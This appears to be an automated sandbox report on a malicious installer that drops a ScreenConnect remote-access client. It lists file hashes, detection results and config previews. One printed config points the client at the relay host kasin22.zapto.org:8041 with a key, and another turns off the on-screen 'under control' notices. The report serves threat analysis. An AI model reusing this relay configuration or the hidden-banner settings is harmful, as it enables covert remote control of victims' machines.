                                                              SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Joe Sandbox View:
                                                              • Filename: setup.msi, Detection: malicious, Browse
                                                              • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                              • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                              • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                              • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                              • Filename: statments.exe, Detection: malicious, Browse
                                                              • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                              • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                              • Filename: sstatment.exe, Detection: malicious, Browse
                                                              • Filename: extukGiBrn.exe, Detection: malicious, Browse
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):68096
                                                              Entropy (8bit):6.068776675019683
                                                              Encrypted:false
                                                              SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                              MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                              SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                              SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                              SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):95520
                                                              Entropy (8bit):6.505346220942731
                                                              Encrypted:false
                                                              SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                              MD5:361BCC2CB78C75DD6F583AF81834E447
                                                              SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                              SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                              SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 3%, Browse
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):548864
                                                              Entropy (8bit):6.031251664661689
                                                              Encrypted:false
                                                              SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                              MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                              SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                              SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                              SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1721856
                                                              Entropy (8bit):6.639136400085158
                                                              Encrypted:false
                                                              SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                              MD5:9F823778701969823C5A01EF3ECE57B7
                                                              SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                              SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                              SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):260168
                                                              Entropy (8bit):6.416438906122177
                                                              Encrypted:false
                                                              SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                              MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                              SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                              SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                              SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):61216
                                                              Entropy (8bit):6.31175789874945
                                                              Encrypted:false
                                                              SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                              MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                              SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                              SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                              SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):266
                                                              Entropy (8bit):4.842791478883622
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):601376
                                                              Entropy (8bit):6.185921191564225
                                                              Encrypted:false
                                                              SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                              MD5:20AB8141D958A58AADE5E78671A719BF
                                                              SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                              SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                              SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):266
                                                              Entropy (8bit):4.842791478883622
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                              Malicious:true
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):842248
                                                              Entropy (8bit):6.268561504485627
                                                              Encrypted:false
                                                              SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                              MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                              SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                              SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                              SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):81696
                                                              Entropy (8bit):5.862223562830496
                                                              Encrypted:false
                                                              SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                              MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                              SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                              SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                              SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):266
                                                              Entropy (8bit):4.842791478883622
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1970
                                                              Entropy (8bit):4.690426481732819
                                                              Encrypted:false
                                                              SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
                                                              MD5:2744E91BB44E575AD8E147E06F8199E3
                                                              SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
                                                              SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
                                                              SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
                                                              Malicious:false
                                                              Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines (459), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):949
                                                              Entropy (8bit):5.769288678812284
                                                              Encrypted:false
                                                              SSDEEP:24:2dL9hK6E4dl/PmGu44AUXgzfwM3lTX+5iwntUEvH:chh7HHPMLsfwudX+5i8UEv
                                                              MD5:DF5DE516807A78CD5B80282A31AA2DAD
                                                              SHA1:E0B3800819B77E7B313410C6C20C1D47DBE80B38
                                                              SHA-256:0C2BCA1705F12A54A7908BAE7C9345A0B345318B95934D825F41ABF811229159
                                                              SHA-512:DAD3AE167A1DB03345D2BBF6CDB62AE17403B500CA9BE701BC7EB266B9A3709385FA0214CF7DF5626176A478C3B098CCBE3F3DF75B74B0358EB58B036081A892
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=kasin22.zapto.org&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                              Process:C:\Users\user\Desktop\file.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):321
                                                              Entropy (8bit):5.36509199858051
                                                              Encrypted:false
                                                              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                              MD5:1CF2352B684EF57925D98E766BA897F2
                                                              SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                              SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                              SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                              Malicious:true
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):746
                                                              Entropy (8bit):5.349174276064173
                                                              Encrypted:false
                                                              SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                              MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                              SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                              SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                              SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                              Category:dropped
                                                              Size (bytes):1086792
                                                              Entropy (8bit):7.793516535218678
                                                              Encrypted:false
                                                              SSDEEP:24576:4UUGG/qSDceVjLHGeRdtRiypAxiK7cl72km/4aoczU:bG/XcW32gqkAfosU
                                                              MD5:30CA21632F98D354A940903214AE4DE1
                                                              SHA1:6C59A3A65FB8E7D4AD96A3E8D90E72B02091D3F4
                                                              SHA-256:4BB0E9B5C70E3CAEB955397A4A3B228C0EA5836729202B8D4BA1BE531B60DAFC
                                                              SHA-512:47509F092B089EB1FFC115643DCDFBFAC5F50F239DE63ECAD71963EC1D37FF72B89F5A2AEA137ED391BA9BA10947ABBE6103DB1C56032FD6B39A0855CB283509
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):234
                                                              Entropy (8bit):4.977464602412109
                                                              Encrypted:false
                                                              SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                              MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                              SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                              SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                              SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                              Malicious:false
                                                              Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):49152
                                                              Entropy (8bit):4.62694170304723
                                                              Encrypted:false
                                                              SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                              MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                              SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                              SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                              SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):36864
                                                              Entropy (8bit):4.340550904466943
                                                              Encrypted:false
                                                              SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                              MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                              SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                              SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                              SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):57344
                                                              Entropy (8bit):4.657268358041957
                                                              Encrypted:false
                                                              SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                              MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                              SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                              SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                              SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):176128
                                                              Entropy (8bit):5.775360792482692
                                                              Encrypted:false
                                                              SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                              MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                              SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                              SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                              SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):548864
                                                              Entropy (8bit):6.031251664661689
                                                              Encrypted:false
                                                              SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                              MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                              SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                              SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                              SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):11776
                                                              Entropy (8bit):5.267782165666963
                                                              Encrypted:false
                                                              SSDEEP:192:TY8/Qp6lCJuV3jnXtyVNamVNG1YZfCrMmbfHJ7kjvLQbuLd9NEFbOhmX:Z/cBJaLXt2NaheUrMmb/FkjvLQbuZZmX
                                                              MD5:5060FA094CE77A1DB1BEB4010F3C2306
                                                              SHA1:93B017A300C14CEEBA12AFBC23573A42443D861D
                                                              SHA-256:25C495FB28889E0C4D378309409E18C77F963337F790FEDFBB13E5CC54A23243
                                                              SHA-512:2384A0A8FC158481E969F66958C4B7D370BE4219046AB7D77E93E90F7F1C3815F23B47E76EFD8129234CCCB3BCAC2AA8982831D8745E0B733315C1CCF3B1973D
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1721856
                                                              Entropy (8bit):6.639136400085158
                                                              Encrypted:false
                                                              SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                              MD5:9F823778701969823C5A01EF3ECE57B7
                                                              SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                              SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                              SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Process:C:\Users\user\Desktop\file.exe
                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {C65824D8-9903-AFB4-B430-141024FF968F}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                              Category:dropped
                                                              Size (bytes):13377536
